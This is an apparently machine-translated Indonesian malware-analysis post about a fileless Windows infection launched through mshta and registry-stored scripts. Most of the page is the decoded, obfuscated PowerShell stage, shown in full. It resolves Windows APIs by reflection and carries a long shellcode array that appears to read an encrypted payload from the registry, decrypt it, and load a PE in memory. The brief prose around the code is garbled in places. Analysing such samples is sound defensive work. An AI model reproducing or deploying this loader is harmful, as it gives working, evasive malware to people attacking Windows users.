Belajar dengan berlatih: Analisis Malware

  • Whatsapp
Belajar dengan berlatih: Analisis Malware
Belajar dengan berlatih Analisis Malware

News.nextcloud.asia

Kembali ke jalurnya.

Sekarang kita tahu kita harus melihat ke HKCUSoftwareClassesada3d untuk informasi tentang bagaimana ekstensi harus ditangani, mari kita lakukan itu. Pertama, sepertinya kita perlu turun beberapa tingkat untuk mendapatkan data yang menarik.

Setelah menggali, kita melihat mshta.exe meluncurkan apa yang tampaknya menjadi beberapa Javascript yang mencoba untuk mengeksekusi WScript.Shell untuk membaca isinya di HKCUSoftwareekceplfi yang merupakan salah satu entri yang kita pelajari di atas.

Berikut adalah tampilan yang lebih jelas dari JSBeautifier.

Setelah berjalan melalui Monyet laba-laba, kami sekarang memiliki beberapa konten yang masuk akal di awal dan beberapa lebih masuk akal di akhir. Namun, di tengah kami memiliki banyak hal yang tampaknya tidak masuk akal. 🙂

Di atas kita melihat DariBase64String, menyarankan konten dikodekan base64. Mengambil keuntungan dari CyberChef untuk memecahkan kode (memahami apa yang sebelumnya saya sebut tidak masuk akal) konten ini, kita lihat di bawah dengan warna kuning apa yang menunjukkan bahwa kita berurusan dengan PowerShell.

#wukbpzwjdveszmiujeofg
sleep(15);try{
#mpxrd
function gdelegate{
#gvcc
Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);
#shtnvxxbf
$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName("ReflectedDelegate")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule("InMemoryModule",$false).DefineType("XXX","Class,Public,Sealed,AnsiClass,AutoClass",[System.MulticastDelegate]);
#qchm
$TypeBuilder.DefineConstructor("RTSpecialName,HideBySig,Public",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags("Runtime,Managed");
#zzeiqapejn
$TypeBuilder.DefineMethod("Invoke","Public,HideBySig,NewSlot,Virtual",$ReturnType,$Parameters).SetImplementationFlags("Runtime,Managed");
#lskfqqq
return $TypeBuilder.CreateType();}
#cvhi
function gproc{
#tezffvn
Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);
#icaibabqun
$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split("")[-1].Equals("System.dll")};
#faymzrobss
$UnsafeNativeMethods=$SystemAssembly.GetType("Microsoft.Win32.UnsafeNativeMethods");
#rvbu
return $UnsafeNativeMethods.GetMethod("GetProcAddress").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod("GetModuleHandle").Invoke($null,@($Module)))),$Procedure));}
#bujmhw
[Byte[]] $sc32 = 0x55,0x8B,0xEC,0x81,0xC4,0x00,0xFA,<#eg#>0xFF,0xFF,0x53,0x56,0x57,0x53,0x56,0x57,0xFC,0x31,0xD2,0x64,0x8B,0x52,0x30,0x8B,0x52,0x0C,0x8B,0x52,0x14,0x8B,0x72,0x28,<#ndl#>0x6A,0x18,0x59,0x31,0xFF,<#xo#>0x31,0xC0,0xAC,<#ifd#>0x3C,0x61,0x7C,0x02,0x2C,0x20,0xC1,0xCF,0x0D,0x01,0xC7,0xE2,0xF0,0x81,0xFF,0x5B,0xBC,0x4A,<#qu#>0x6A,0x8B,0x5A,0x10,0x8B,0x12,0x75,0xDB,0x89,0x5D,<#vkc#>0xFC,0x5F,0x5E,0x5B,0x8B,0x45,0xFC,0x89,0x45,0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,0x4D,0x5A,0x0F,0x85,0x0F,0x02,0x00,0x00,0x8B,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0x45,0xD4,0x8B,<#ulq#>0x40,0x3C,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,<#lt#>0x83,0xC4,0x08,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0xE5,0x01,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x40,0x78,0x03,0x45,0xFC,0x89,0x45,0xCC,0x8B,<#da#>0x45,0xCC,0x8B,0x40,0x18,0x85,0xC0,0x0F,0x8C,0xCB,0x01,0x00,0x00,0x40,0x89,0x85,0x3C,0xFF,<#zq#>0xFF,0xFF,<#kbv#>0x33,0xF6,0x8B,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0x45,0xCC,0x8B,0x40,0x20,0x33,0xD2,0x52,0x50,0x8B,<#cvq#>0xC6,0xC1,0xE0,0x02,0x99,0x03,0x04,0x24,<#fys#>0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x8B,0x08,0x03,0x4D,0xFC,0x81,0x39,0x4C,0x6F,0x61,0x64,0x75,0x56,0x8D,0x41,0x04,0x81,0x38,0x4C,0x69,0x62,0x72,0x75,0x4B,0x8D,0x41,0x08,0x81,0x38,<#ya#>0x61,0x72,0x79,0x41,0x75,0x40,0x8D,0x41,0x0C,0x80,0x38,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,<#sl#>0x45,0xFC,0x33,0xD2,<#gj#>0x52,0x50,0x8B,0xC6,0x03,0xC0,<#anh#>0x99,0x03,0x04,0x24,0x13,<#dz#>0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,<#jtt#>0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,0xBC,0x81,0x39,0x47,0x65,0x74,<#aaw#>0x50,0x75,0x56,0x8D,0x41,0x04,0x81,0x38,0x72,0x6F,0x63,0x41,0x75,0x4B,0x8D,0x41,0x08,0x81,0x38,0x64,0x64,0x72,0x65,0x75,0x40,0x8D,0x41,0x0E,0x80,0x38,0x00,0x75,<#jdj#>0x38,0x8B,0x45,0xCC,<#dtd#>0x8B,0x40,0x24,0x03,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,<#kb#>0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,<#jta#>0x52,<#phr#>0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,0xB8,0x81,<#ros#>0x39,0x56,0x69,0x72,0x74,0x75,0x56,0x8D,0x41,0x04,0x81,0x38,0x75,0x61,0x6C,0x41,0x75,0x4B,0x8D,0x41,<#gr#>0x08,<#zb#>0x81,0x38,0x6C,0x6C,0x6F,0x63,0x75,0x40,0x8D,0x41,0x0C,0x80,0x38,0x00,0x75,0x38,0x8B,0x45,<#gtc#>0xCC,0x8B,<#ua#>0x40,<#me#>0x24,0x03,0x45,0xFC,0x33,0xD2,0x52,<#ew#>0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,<#it#>0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,<#br#>0xA8,<#no#>0x81,0x39,0x45,0x78,0x69,0x74,<#rpm#>0x75,0x63,0x8D,0x41,0x04,0x81,0x38,0x50,<#vwd#>0x72,0x6F,0x63,0x75,0x58,0x8D,<#nik#>0x41,0x08,0x80,0x38,0x65,0x75,0x50,0x8D,0x41,0x09,0x80,0x38,0x73,0x75,0x48,0x8D,0x41,0x0A,0x80,0x38,0x73,0x75,0x40,0x83,0xC1,0x0B,0x80,0x39,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,0xFC,<#gt#>0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,<#hx#>0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,<#wac#>0x8B,0x52,0x1C,<#yhq#>0x03,0x55,0xFC,0x0F,0xB7,<#ub#>0xC0,0xC1,0xE0,0x02,0x03,<#xvx#>0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,0xA4,0x46,0xFF,0x8D,<#xi#>0x3C,0xFF,0xFF,0xFF,0x0F,0x85,0x3E,0xFE,<#jgv#>0xFF,0xFF,0xC6,0x85,0x2F,0xFF,0xFF,0xFF,0x61,0xC6,0x85,0x30,0xFF,0xFF,0xFF,0x64,0xC6,0x85,0x31,0xFF,0xFF,0xFF,0x76,0xC6,0x85,0x32,0xFF,0xFF,<#few#>0xFF,0x61,0xC6,0x85,0x33,0xFF,0xFF,0xFF,0x70,0xC6,<#pqm#>0x85,0x34,0xFF,0xFF,0xFF,0x69,0xC6,0x85,0x35,0xFF,0xFF,0xFF,0x33,0xC6,<#ow#>0x85,<#he#>0x36,0xFF,0xFF,0xFF,0x32,0xC6,0x85,0x37,0xFF,0xFF,0xFF,0x2E,0xC6,0x85,0x38,0xFF,0xFF,0xFF,0x64,0xC6,0x85,0x39,0xFF,<#vi#>0xFF,0xFF,0x6C,0xC6,0x85,0x3A,0xFF,0xFF,0xFF,0x6C,0xC6,0x85,0x3B,0xFF,<#bwf#>0xFF,0xFF,0x00,0x8D,0x85,<#hca#>0x2F,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xBC,0x8B,0xD8,0x85,0xDB,0x75,0x05,0x6A,0x00,0xFF,<#cz#>0x55,0xA4,0x89,0x5D,0xD4,0x8B,0x45,0xD4,0x66,<#gb#>0x81,0x38,0x4D,0x5A,0x0F,0x85,0x4F,<#gk#>0x01,0x00,0x00,0x8B,0xC3,0x33,0xD2,0x52,0x50,0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,<#vrg#>0x08,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0x26,0x01,0x00,<#ff#>0x00,0x8B,0x45,0xD0,0x8B,0x40,0x78,0x03,0xC3,0x89,0x45,0xCC,0x8B,0x45,0xCC,<#yr#>0x8B,0x40,0x18,0x85,0xC0,0x0F,0x8C,0x0D,0x01,0x00,0x00,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,<#cbm#>0x8B,0xC3,0x33,<#pdr#>0xD2,<#xuj#>0x52,0x50,<#ect#>0x8B,0x45,0xCC,<#esg#>0x8B,0x40,0x20,0x33,0xD2,0x52,0x50,0x8B,0xC6,0xC1,0xE0,0x02,0x99,0x03,<#mw#>0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,<#llc#>0xC4,<#gc#>0x08,0x8B,0x08,0x03,0xCB,0x81,<#ca#>0x39,0x52,0x65,0x67,0x4F,0x75,0x5B,0x8D,0x41,0x04,0x81,0x38,0x70,0x65,0x6E,0x4B,0x75,0x50,0x8D,0x41,0x08,0x81,0x38,0x65,0x79,0x45,0x78,0x75,0x45,0x8D,0x41,0x0C,0x80,0x38,<#bn#>0x41,0x75,0x3D,0x8D,0x41,0x0D,0x80,0x38,0x00,0x75,<#xy#>0x35,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,<#oa#>0xC3,0x33,0xD2,<#vg#>0x52,0x50,0x8B,0xC6,<#da#>0x03,0xC0,0x99,<#ht#>0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,<#aae#>0x8B,0x52,0x1C,0x03,<#gt#>0xD3,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0xC3,0x89,0x45,0xB0,0x81,0x39,0x52,0x65,0x67,0x51,0x75,0x5E,<#pp#>0x8D,0x41,0x04,0x81,0x38,0x75,0x65,0x72,0x79,<#yht#>0x75,0x53,0x8D,0x41,0x08,0x81,0x38,0x56,0x61,0x6C,0x75,0x75,0x48,0x8D,0x41,0x0C,0x81,<#vq#>0x38,0x65,0x45,0x78,0x41,<#vh#>0x75,0x3D,0x83,0xC1,0x10,0x80,0x39,0x00,0x75,0x35,0x8B,0x45,0xCC,0x8B,0x40,<#ys#>0x24,0x03,0xC3,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,<#sw#>0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0xD3,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,<#smh#>0x02,0x03,0xC3,0x89,0x45,<#hj#>0xAC,0x46,0xFF,0x8D,<#dyn#>0x3C,0xFF,0xFF,0xFF,0x0F,0x85,0xFC,0xFE,0xFF,0xFF,0x8B,<#fq#>0x45,0x08,0x05,0x48,0x0A,0x00,<#lz#>0x00,0x89,0x85,0x7C,<#mfp#>0xFF,0xFF,0xFF,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x05,0xE4,0x00,0x00,0x00,0x89,0x85,0x78,0xFF,0xFF,0xFF,0x33,0xDB,0x33,0xC0,0x89,<#nhq#>0x85,0x64,<#zmn#>0xFF,0xFF,0xFF,0x33,0xC0,0x89,0x85,0x60,0xFF,0xFF,0xFF,0x8D,0x85,0x70,0xFF,0xFF,0xFF,0x50,0x6A,0x01,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x50,<#con#>0x68,0x02,0x00,0x00,0x80,<#mla#>0xFF,0x55,0xB0,0x85,0xC0,0x0F,0x85,0x86,0x00,0x00,0x00,<#efd#>0x8D,<#sry#>0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8D,0x85,0x6C,<#ay#>0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,<#vgq#>0x85,0x7C,0xFF,<#fam#>0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,0xFF,0xFF,0xFF,0x50,<#uwj#>0xFF,0x55,0xAC,0x85,0xC0,0x75,0x5C,0x83,0xBD,0x60,0xFF,0xFF,0xFF,0x64,0x76,0x53,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,<#goi#>0x60,<#isp#>0xFF,0xFF,0xFF,<#ahc#>0x50,0x6A,<#gpr#>0x00,0xFF,0x55,<#uzi#>0xA8,0x89,0x85,0x64,0xFF,0xFF,0xFF,0x83,<#tc#>0xBD,0x64,<#ucu#>0xFF,0xFF,0xFF,0x00,0x74,0x31,0x8D,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x50,0x8D,0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x02,0xB3,0x01,0x33,0xC0,0x89,0x85,<#rwz#>0x70,0xFF,0xFF,0xFF,0x84,0xDB,0x0F,0x85,0xB8,0x00,<#ut#>0x00,0x00,0x33,0xC0,0x89,0x85,<#ona#>0x64,0xFF,0xFF,0xFF,0x33,0xC0,0x89,<#btw#>0x85,<#yzx#>0x60,0xFF,0xFF,0xFF,0x8D,<#yco#>0x85,0x70,0xFF,0xFF,0xFF,0x50,0x6A,0x01,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x50,0x68,0x01,0x00,0x00,0x80,0xFF,0x55,0xB0,<#fi#>0x85,0xC0,<#mfr#>0x0F,0x85,0x86,0x00,0x00,0x00,0x8D,0x85,0x60,0xFF,0xFF,0xFF,<#or#>0x50,0x6A,0x00,0x8D,0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,<#by#>0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x5C,0x83,0xBD,0x60,0xFF,0xFF,0xFF,0x64,0x76,0x53,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0xFF,0x55,0xA8,0x89,0x85,<#jo#>0x64,0xFF,0xFF,0xFF,0x83,0xBD,0x64,0xFF,0xFF,0xFF,0x00,<#cf#>0x74,0x31,0x8D,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x8B,0x85,0x64,0xFF,<#rqy#>0xFF,0xFF,0x50,0x8D,0x85,0x6C,<#em#>0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,<#ut#>0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x02,0xB3,0x01,0x84,0xDB,0x75,0x05,0x6A,0x00,0xFF,0x55,0xA4,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x8B,0x80,0xDC,<#hjy#>0x00,0x00,0x00,0x50,0x8B,0x85,0x7C,<#nwm#>0xFF,0xFF,0xFF,0x83,0xC0,0x52,0x50,0x8D,0x85,<#bmw#>0x00,0xFA,0xFF,0xFF,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x33,0xF6,0x8D,0x8D,0x00,0xFB,0xFF,0xFF,0x89,0x31,0x46,<#jd#>0x83,<#pq#>0xC1,0x04,0x81,0xFE,0x00,0x01,0x00,0x00,0x75,0xF2,0x33,0xDB,0x33,0xF6,0x8D,0x8D,0x00,0xFB,0xFF,0xFF,0x03,0x19,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0xFF,0xB0,0xDC,0x00,0x00,0x00,0x8B,0xC6,<#kn#>0x5A,0x8B,0xFA,0x33,0xD2,0xF7,0xF7,0x33,0xC0,0x8A,0x84,0x15,0x00,0xFA,0xFF,0xFF,0x03,0xD8,0x81,0xE3,0xFF,<#ez#>0x00,0x00,0x00,0x8A,0x01,0x8B,0x94,0x9D,0x00,0xFB,0xFF,0xFF,0x89,0x11,0x25,0xFF,0x00,0x00,0x00,0x89,0x84,0x9D,<#pgr#>0x00,0xFB,0xFF,0xFF,0x46,0x83,0xC1,0x04,<#lr#>0x81,0xFE,0x00,0x01,0x00,0x00,0x75,0xB5,0x33,0xDB,0x33,0xFF,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0xFF,0x55,<#jij#>0xA8,0x89,0x85,0x5C,0xFF,0xFF,0xFF,0x83,0xBD,0x5C,0xFF,0xFF,<#vw#>0xFF,0x00,0x74,0x29,0x8B,0x85,0x5C,0xFF,0xFF,0xFF,0x89,0x85,0x4C,0xFF,0xFF,<#iku#>0xFF,0x8B,0x85,<#js#>0x60,<#kd#>0xFF,0xFF,0xFF,0x50,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x50,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x50,0xFF,0x95,<#wh#>0x78,0xFF,0xFF,<#wwb#>0xFF,0xEB,0x05,0x6A,0x00,0xFF,0x55,0xA4,0x8B,0x85,0x60,0xFF,0xFF,0xFF,<#si#>0x48,0x85,0xC0,0x72,0x74,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x43,0x81,0xE3,0xFF,0x00,0x00,0x00,0x03,0xBC,0x9D,0x00,0xFB,0xFF,0xFF,0x81,0xE7,0xFF,0x00,0x00,0x00,0x8A,0x84,0x9D,0x00,0xFB,0xFF,0xFF,0x8B,0x94,0xBD,0x00,0xFB,0xFF,0xFF,0x89,0x94,0x9D,0x00,0xFB,0xFF,0xFF,0x25,0xFF,0x00,0x00,0x00,0x89,0x84,0xBD,0x00,0xFB,0xFF,0xFF,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x8A,0x04,0x30,0x8B,0x94,0x9D,0x00,0xFB,0xFF,<#sru#>0xFF,0x03,0x94,0xBD,0x00,0xFB,0xFF,0xFF,0x81,0xE2,0xFF,0x00,0x00,0x00,0x32,0x84,0x95,0x00,0xFB,0xFF,0xFF,0x8B,0x95,0x4C,0xFF,0xFF,0xFF,0x88,<#ev#>0x04,0x32,0x46,0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,0x75,0x95,0x8B,0x85,0x4C,<#oq#>0xFF,0xFF,0xFF,0x89,0x45,<#ah#>0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,0x4D,<#ta#>0x5A,0x0F,0x85,0xDA,0x02,0x00,0x00,0x8B,0x45,0xD4,<#qy#>0x8B,0x40,0x3C,0x03,0x85,0x4C,0xFF,0xFF,0xFF,0x89,0x45,<#kco#>0xD0,0x8B,0x45,0xD0,0x81,<#vo#>0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0xBC,0x02,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x58,0x50,0x03,0xDB,<#xlf#>0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x53,0x6A,<#wle#>0x00,0xFF,0x55,0xA8,0x89,0x45,<#bf#>0xF8,0x83,0x7D,<#of#>0xF8,0x00,0x0F,0x84,0x9A,0x02,0x00,0x00,0x8B,0x45,0xD0,0x8B,<#xp#>0x40,<#vxw#>0x54,<#vef#>0x50,0x8B,0x85,0x4C,<#ew#>0xFF,0xFF,0xFF,0x50,0x8B,0x45,0xF8,0x50,<#bbd#>0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x6A,0x04,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x05,0xE0,0x00,<#dfh#>0x00,0x00,0x50,0x8B,0x45,0xD0,0x8B,0x40,0x50,0x03,0x45,0xF8,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x8B,0x80,0xE0,0x00,0x00,0x00,0x50,<#hxe#>0x8B,<#od#>0x85,0x4C,0xFF,0xFF,0xFF,0x50,0x8B,0x45,0xD0,0x8B,<#bdt#>0x40,0x50,0x03,0x45,0xF8,0x83,0xC0,0x04,0x50,0xFF,0x95,0x78,<#boc#>0xFF,0xFF,0xFF,0x6A,0x60,0x8B,0x85,<#wu#>0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x7A,0x50,0x8B,0x45,0xD0,0x8B,0x40,0x50,0x03,0x45,0xF8,0x83,<#on#>0xC0,0x04,0x8B,0x95,0x7C,0xFF,<#gjg#>0xFF,0xFF,0x03,0x82,0xE0,0x00,0x00,0x00,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,0x0F,0xB7,0x40,0x06,0x48,0x85,0xC0,<#kiu#>0x7C,0x5F,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x8B,0x55,0xD4,0x8B,0x52,0x3C,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x03,0xD0,0x81,0xC2,0xF8,0x00,0x00,0x00,0x8B,0xCE,0xC1,0xE1,0x03,<#zr#>0x8D,0x0C,0x89,0x03,0xD1,0x89,0x95,0x50,0xFF,0xFF,0xFF,0x8B,0x95,0x50,0xFF,0xFF,0xFF,0x8B,0x52,<#hxa#>0x10,0x52,0x8B,0x95,0x50,0xFF,0xFF,0xFF,0x8B,0x52,0x14,0x03,0xD0,0x52,0x8B,0x85,0x50,0xFF,0xFF,0xFF,0x8B,0x40,0x0C,0x03,0x45,0xF8,0x50,0xFF,<#ro#>0x95,0x78,0xFF,0xFF,0xFF,<#yc#>0x46,0xFF,0x8D,0x3C,0xFF,0xFF,<#ypg#>0xFF,0x75,0xAA,0x8B,0x45,0xD0,0x8B,0x40,0x34,0x3B,0x45,0xF8,0x0F,0x84,0xCB,0x00,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x55,0xF8,0x2B,0x50,0x34,0x89,0x55,0xD8,0x8B,0x45,<#jxt#>0xF8,0x89,0x45,0xF0,0x8B,0x45,0xD0,0x83,0xB8,0xA4,0x00,0x00,<#da#>0x00,0x00,0x0F,0x86,<#pyu#>0x87,0x00,<#kza#>0x00,0x00,0x8B,0x45,0xD0,0x8B,0x80,0xA0,0x00,<#vv#>0x00,0x00,0x03,0x45,0xF0,0x89,<#um#>0x45,0xEC,0xEB,0x6E,0x8B,0x45,0xEC,0x8B,0x00,0x03,0x45,0xF0,0x89,<#kzd#>0x45,0xE8,0x8B,0x45,0xEC,0x83,0xC0,0x08,0x89,0x45,0xE4,0x8B,0x45,0xEC,0x8B,0x40,0x04,<#frn#>0x83,0xE8,0x08,0xD1,0xE8,0x48,0x85,0xC0,0x72,0x3E,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x8B,0x45,0xE4,0x66,0x8B,0x10,0x0F,0xB7,0xC2,0xC1,0xE8,0x0C,0x8B,0xCA,0x66,0x81,0xE1,0xFF,0x0F,0x0F,0xB7,0xC9,0x83,0xF8,0x03,<#uvt#>0x75,0x10,<#dys#>0x8B,<#xss#>0x45,0xE8,0x03,0xC1,0x89,0x45,<#qsp#>0xE0,0x8B,0x45,0xE0,0x8B,0x55,0xD8,0x01,0x10,0x83,0x45,0xE4,0x02,0xFF,0x8D,0x3C,0xFF,0xFF,<#iow#>0xFF,0x75,0xC9,0x8B,0x45,0xEC,0x8B,0x40,0x04,0x03,0x45,0xEC,0x89,0x45,0xEC,0x8B,0x45,0xEC,0x83,0x38,0x00,0x77,0x8A,0x8B,0x45,0xD0,0x8B,0x55,0xF8,0x89,0x50,0x34,0x68,0xF8,0x00,0x00,0x00,0x8B,0x45,0xD0,0x50,0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x03,0x45,0xF8,0x50,0xFF,0x95,0x78,0xFF,0xFF,<#md#>0xFF,0x8B,0x45,0xD0,0x05,0x80,0x00,0x00,0x00,0x89,0x45,0x90,0x8B,0x45,0x90,0x83,0x78,0x04,0x00,0x0F,<#hr#>0x86,0x9E,0x00,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x80,0x80,0x00,0x00,<#has#>0x00,0x03,0x45,0xF8,<#oz#>0x89,0x45,0x8C,0xEB,0x7F,0x03,0x7D,0xF8,0x57,0xFF,0x55,0xBC,0x8B,<#qmp#>0xD8,0x85,0xDB,0x74,<#se#>0x72,0x8B,0x45,0x8C,0x83,0x38,0x00,0x74,0x0D,0x8B,0x45,0x8C,0x8B,0x00,0x03,0x45,0xF8,0x89,0x45,0x88,0xEB,<#nhi#>0x0C,0x8B,0x45,0x8C,0x8B,0x40,0x10,0x03,<#zw#>0x45,0xF8,0x89,0x45,0x88,0x8B,<#re#>0x45,<#fgs#>0x8C,0x8B,0x40,<#be#>0x10,0x03,0x45,0xF8,0x89,0x45,0x84,0xEB,0x37,0x8B,0x45,0x88,<#me#>0x8B,0x30,0xF7,0xC6,0x00,0x00,0x00,0x80,<#nn#>0x74,0x12,0x81,0xE6,0xFF,0xFF,0x00,0x00,<#odn#>0x56,0x53,<#hb#>0xFF,0x55,0xB8,0x8B,0x55,0x84,0x89,0x02,0xEB,0x10,0x03,0x75,0xF8,0x83,<#md#>0xC6,0x02,0x56,0x53,0xFF,0x55,0xB8,0x8B,0x55,0x84,0x89,0x02,0x83,0x45,0x88,0x04,0x83,0x45,0x84,<#cyw#>0x04,0x8B,<#uf#>0x45,0x88,0x83,0x38,0x00,<#xfd#>0x75,<#uwx#>0xC1,<#kv#>0x83,0x45,0x8C,0x14,0x8B,0x45,0x8C,0x8B,0x78,0x0C,0x85,0xFF,0x0F,0x85,0x73,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,0x8B,0x40,0x28,0x03,0x45,0xF8,0x89,0x45,0xF4,0x31,0xC0,0x50,0x6A,0x01,0xFF,0x75,<#vr#>0xF8,0xFF,0x55,0xF4,0x6A,0x00,0xFF,0x55,0xA4,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00,0x8D,<#go#>0x40,0x00,0x73,0x6F,0x66,0x74,0x77,0x61,0x72,0x65,0x5C,0x65,0x6B,0x63,0x65,0x00,0x00,<#mmq#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#xa#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x62,0x6E,0x6A,0x66,0x6F,0x65,0x00,<#vjy#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x5E,0x67,0x3A,0x12,0x9A,0x95,0x15,0x63,<#zuj#>0x06,0xAF,0x82,0xDD,0xA0,0x4D,<#at#>0x53,0x85,0xF4,0x57,0xD5,<#mhv#>0x5D,0x57,0x6A,0xB0,0x69,0x4A,0x08,0xCA,0xD1,0x9F,0x4F,0xDE,0x00,0x00,0x00,0x00